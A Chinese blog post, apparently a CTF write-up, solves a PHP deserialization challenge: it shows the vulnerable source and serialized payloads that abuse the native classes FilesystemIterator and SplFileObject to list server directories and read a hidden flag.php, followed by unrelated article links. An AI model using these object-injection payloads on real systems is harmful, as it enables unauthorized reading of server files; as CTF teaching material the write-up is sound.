当前位置：首页 > news >正文

【web]-反序列化-easy ? not easy

news 2026/5/16 12:17:00

打开后看到源码

<?php
error_reporting(0);
highlight_file(__FILE__);class A{public $class;public $para;public $check;public function __construct(){$this->class = "B";$this->para = "ctfer";echo new  $this->class ($this->para);}public function __wakeup(){$this->check = new C;if($this->check->vaild($this->para) && $this->check->vaild($this->class)) {echo new  $this->class ($this->para);}elsedie('bad hacker~');}}
class B{var $a;public function __construct($a){$this->a = $a;echo ("hello ".$this->a);}
}
class C{function vaild($code){$pattern = '/[!|@|#|$|%|^|&|*|=|\'|"|:|;|?]/i';if (preg_match($pattern, $code)){return false;}elsereturn true;}
}if(isset($_GET['pop'])){unserialize($_GET['pop']);
}
else{$a=new A;} hello ctfer

分析源码只看到__wakeup函数，其他类没有什么可以利用的，起点、终点、跳板不管用了。只能用php原生态类来输出文件列表读取文件（而且过滤了一些特殊符号，命令通配符等，包含数字字母\，也只能用路径了），代替命令执行。最终的目的也是读取文件获取内容哦。

FilesystemIterator 遍历目录直接echo会输出目录下第一个文件夹或文件名
SplFileObject 读取文件内容，按行读取，跨行需要遍历
DirectoryIterator 遍历目录直接echo会输出目录下的

读取一下目录/var/www/html

<?php
class A{public $class = 'FilesystemIterator';public $para = '/var/www/html';public $check;
}
$a =  new A();
echo serialize($a);
?>O:1:"A":3:{s:5:"class";s:18:"FilesystemIterator";s:4:"para";s:13:"/var/www/html";s:5:"check";N;}

输出目录：1aMaz1ng_y0u_c0Uld_f1nd_F1Ag_hErE

继续构造

<?php
class A{public $class = 'FilesystemIterator';public $para = '/var/www/html/1aMaz1ng_y0u_c0Uld_f1nd_F1Ag_hErE';public $check;
}
$a =  new A();
echo serialize($a);
?>O:1:"A":3:{s:5:"class";s:18:"FilesystemIterator";s:4:"para";s:47:"/var/www/html/1aMaz1ng_y0u_c0Uld_f1nd_F1Ag_hErE";s:5:"check";N;}

显示 flag.php,接下来就要读取内容

<?php
class A{public $class = 'SplFileObject ';public $para = '/var/www/html/1aMaz1ng_y0u_c0Uld_f1nd_F1Ag_hErE/flag.php';public $check;
}
$a =  new A();
echo serialize($a);
?>O:1:"A":3:{s:5:"class";s:14:"SplFileObject ";s:4:"para";s:56:"/var/www/html/1aMaz1ng_y0u_c0Uld_f1nd_F1Ag_hErE/flag.php";s:5:"check";N;}

输入后得到结果：aced3598a34a561715dacfe32a328c1c

【web]-反序列化-easy ? not easy

相关文章：

【web]-反序列化-easy ? not easy

python 内置函数、math模块

Ubuntu Docker 安装

vue接入google map自定义marker教程

Spring Boot集成Redis与Lua脚本：构建高效的分布式多规则限流系统

四、单线程多路IO复用+多线程业务工作池

单元测试--Junit

达梦数据库系列—30. DTS迁移Mysql到DM

随记0000——从0、1 到 C语言

C++ | Leetcode C++题解之第264题丑数II

前端系列-8 集中式状态管理工具pinia

pytest使用

单表查询总结与多表查询概述

redis的使用场景和持久化方式

嵌入式Linux学习: 设备树实验

eqmx上读取数据处理以后添加到数据库中

【中项】系统集成项目管理工程师-第5章软件工程-5.3软件设计

C++学习笔记-内联函数使用和含义

数据库(MySQL)-视图、存储过程、触发器

js 优雅的实现模板方法设计模式

别再死记PRBS7/15了！用Python+NumPy手搓一个可配置的PRBS码生成器（附完整代码）

用STC89C52单片机DIY一个乒乓球发球机：从电路图到代码的完整实现（附避坑指南）

【小白也能懂得操作】解决 OpenClaw 操作电脑受限问题详细指南（含安装包）

（2024实战指南）从零到一：CTFd平台部署、Docker动态靶场构建与动态Flag生成全解析

小白程序员必看！收藏这份Agent入门指南，抢占未来运维高薪岗位

Python应用性能监控实战：New Relic APM代理原理与部署指南

终极指南：3分钟掌握Deepin Boot Maker，轻松制作Linux启动盘

Minecraft服务器技能管理自动化：mcpskills-cli命令行工具实战指南

XXMI启动器终极指南：一站式游戏模组管理平台，轻松实现二次元游戏个性化

Circuit Playground开发板入门：从零到一玩转集成传感器与Arduino编程